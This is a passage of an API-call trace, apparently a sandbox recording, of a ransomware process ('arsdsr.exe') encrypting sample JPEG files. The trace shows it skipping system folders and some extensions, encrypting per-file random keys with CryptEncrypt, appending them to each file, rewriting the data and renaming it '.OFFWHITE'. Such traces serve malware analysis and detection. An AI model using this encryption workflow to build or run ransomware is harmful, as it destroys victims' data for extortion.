lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0xbea1f, lpOverlapped=0x0) returned 1 [0154.235] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.235] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xbea1f, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0xbea1f, lpOverlapped=0x0) returned 1 [0154.238] GetProcessHeap () returned 0x500000 [0154.238] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.243] CloseHandle (hObject=0x21c) returned 1 [0154.243] GetProcessHeap () returned 0x500000 [0154.243] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.243] GetProcessHeap () returned 0x500000 [0154.243] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.243] GetProcessHeap () returned 0x500000 [0154.243] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.243] GetProcessHeap () returned 0x500000 [0154.243] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.243] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" [0154.243] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.OFFWHITE" [0154.243] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.offwhite")) returned 1 [0154.244] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".") returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="..") returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="...") returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="windows") returned -1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="$recycle.bin") returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="rsa") returned -1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="ntuser.dat") returned -1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="programdata") returned -1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="appdata") returned 1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="program files") returned -1 [0154.244] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="program files (x86)") returned -1 [0154.244] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.244] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Lighthouse.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" [0154.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.245] PathFindExtensionW (pszPath="Lighthouse.jpg") returned=".jpg" [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.245] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.245] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0154.245] GetProcessHeap () returned 0x500000 [0154.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543f08 [0154.246] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.247] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=561276) returned 1 [0154.247] GetProcessHeap () returned 0x500000 [0154.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.247] GetProcessHeap () returned 0x500000 [0154.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.247] GetProcessHeap () returned 0x500000 [0154.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.247] GetProcessHeap () returned 0x500000 [0154.247] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.247] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.247] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.247] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.247] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.247] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.247] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.247] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.247] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.247] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.248] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.248] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.248] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.248] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8907c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.248] SetLastError (dwErrCode=0x0) [0154.248] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.250] GetLastError () returned 0x0 [0154.250] GetLastError () returned 0x0 [0154.250] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8917c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.250] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.250] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8927c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.250] WriteFile (in: hFile=0x21c, lpBuffer=0x543f08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543f08*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.250] GetProcessHeap () returned 0x500000 [0154.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8907c) returned 0x2a60020 [0154.251] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.251] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x8907c, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0x8907c, lpOverlapped=0x0) returned 1 [0154.294] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.294] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x8907c, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0x8907c, lpOverlapped=0x0) returned 1 [0154.296] GetProcessHeap () returned 0x500000 [0154.296] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.299] CloseHandle (hObject=0x21c) returned 1 [0154.299] GetProcessHeap () returned 0x500000 [0154.299] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.299] GetProcessHeap () returned 0x500000 [0154.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.300] GetProcessHeap () returned 0x500000 [0154.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.300] GetProcessHeap () returned 0x500000 [0154.300] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.300] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" [0154.300] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.OFFWHITE" [0154.300] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.offwhite")) returned 1 [0154.300] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="..") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="...") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="windows") returned -1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="$recycle.bin") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="rsa") returned -1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="ntuser.dat") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="programdata") returned -1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="appdata") returned 1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="program files") returned -1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="program files (x86)") returned -1 [0154.301] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.301] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Penguins.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" [0154.301] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.301] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.301] PathFindExtensionW (pszPath="Penguins.jpg") returned=".jpg" [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.301] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.301] lstrcmpiW (lpString1="Penguins.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0154.302] GetProcessHeap () returned 0x500000 [0154.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543f18 [0154.302] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.302] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=777835) returned 1 [0154.302] GetProcessHeap () returned 0x500000 [0154.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.302] GetProcessHeap () returned 0x500000 [0154.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.302] GetProcessHeap () returned 0x500000 [0154.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0154.302] GetProcessHeap () returned 0x500000 [0154.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.302] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0154.302] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.302] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.302] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0154.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.303] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0154.303] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.303] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.303] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0154.303] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbde6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.303] SetLastError (dwErrCode=0x0) [0154.303] WriteFile (in: hFile=0x21c, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.305] GetLastError () returned 0x0 [0154.305] GetLastError () returned 0x0 [0154.305] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbdf6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.305] WriteFile (in: hFile=0x21c, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0154.305] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xbe06b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.305] WriteFile (in: hFile=0x21c, lpBuffer=0x543f18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x543f18*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0154.305] GetProcessHeap () returned 0x500000 [0154.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xbde6b) returned 0x2a60020 [0154.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.306] ReadFile (in: hFile=0x21c, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xbde6b, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295dec0*=0xbde6b, lpOverlapped=0x0) returned 1 [0154.365] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.365] WriteFile (in: hFile=0x21c, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xbde6b, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295decc*=0xbde6b, lpOverlapped=0x0) returned 1 [0154.367] GetProcessHeap () returned 0x500000 [0154.367] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0154.371] CloseHandle (hObject=0x21c) returned 1 [0154.371] GetProcessHeap () returned 0x500000 [0154.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0154.371] GetProcessHeap () returned 0x500000 [0154.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0154.371] GetProcessHeap () returned 0x500000 [0154.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0154.371] GetProcessHeap () returned 0x500000 [0154.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0154.371] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" [0154.372] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.OFFWHITE") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.OFFWHITE" [0154.372] MoveFileW (lpExistingFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.OFFWHITE" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.offwhite")) returned 1 [0154.372] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x3a0038, dwReserved1=0x295e9f0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0154.372] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".") returned 1 [0154.372] lstrcmpiW (lpString1="Tulips.jpg", lpString2="..") returned 1 [0154.372] lstrcmpiW (lpString1="Tulips.jpg", lpString2="...") returned 1 [0154.372] lstrcmpiW (lpString1="Tulips.jpg", lpString2="windows") returned -1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="$recycle.bin") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="rsa") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="ntuser.dat") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="programdata") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="appdata") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="program files") returned 1 [0154.373] lstrcmpiW (lpString1="Tulips.jpg", lpString2="program files (x86)") returned 1 [0154.373] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\" [0154.373] lstrcatW (in: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Tulips.jpg" | out: lpString1="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" [0154.373] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0154.373] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0154.373] PathFindExtensionW (pszPath="Tulips.jpg") returned=".jpg" [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0154.374] lstrcmpiW (lpString1="Tulips.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0154.374] GetProcessHeap () returned 0x500000 [0154.374] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543f28 [0154.374] CreateFileW (lpFileName="C:/Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0154.374] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=620888) returned 1 [0154.374] GetProcessHeap () returned 0x500000 [0154.374] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0154.374] GetProcessHeap () returned 0x500000 [0154.374] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0154.374] GetProcessHeap () returned 0x500000 [0154.374] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0154.374] GetProcessHeap () returned 0x500000 [0154.374] RtlAllocateHeap (HeapHandle=0x500000, 